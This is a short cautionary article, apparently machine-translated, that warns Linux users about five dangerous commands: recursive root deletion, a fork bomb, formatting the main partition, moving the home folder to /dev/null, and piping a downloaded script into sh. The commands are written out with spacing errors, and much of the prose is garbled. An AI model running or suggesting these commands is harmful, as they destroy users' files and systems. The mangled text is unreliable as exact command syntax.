Dangerous Linux Commands

Become a Linux system that has become a fast-spreading and many users Atasaron to learn how to deal with him and that the center where orders (Terminal) is the system's most prominent features, it needs to be cautious while dealing with his Linux Commands orders.
Today we will look at the subject to five linux commands shall not try it, but you're aware of what you do because it will display your files or an entire operating system to damage.

Be careful while using this Linux Commands.

- rm -rf /
It does this by deleting all files possible, whether on the hard drive, or even on any external storage device connected to it will not appear as you request to confirm it.

- : () {: |: &} ;:
Called Fork Bomb, where he applied when it copies itself again, you have to become two, these two supersede themselves again and them all ... Linux Commands so that the device consumes resources and system freezes Linux Commands.

- mkfs.ext4 / dev / sda1
This reflected an important thing to do in the process of the Format Partition of the main hard drive.

- mv ~ / dev / null
~ This represents the Home folder and / dev / null in the circles of Unix is a black hole and thus Implementing this matter is to send all the files to the home folder 'nothingness' any permanently deleted. It can also make up ~ on behalf of any other folder and will have the same fate.

use this Linux Commands on virtual machine

- wget http: // some_untrusted_source -O- | sh
This matter will download the script from the source unreliable and operated by the thing which often be harmful, so you should not run such a thing from unreliable sources Linux Commands.

These were some orders that must be used to warn against randomly and that you love the experience I advise you her experience on the operating system and the placebo.

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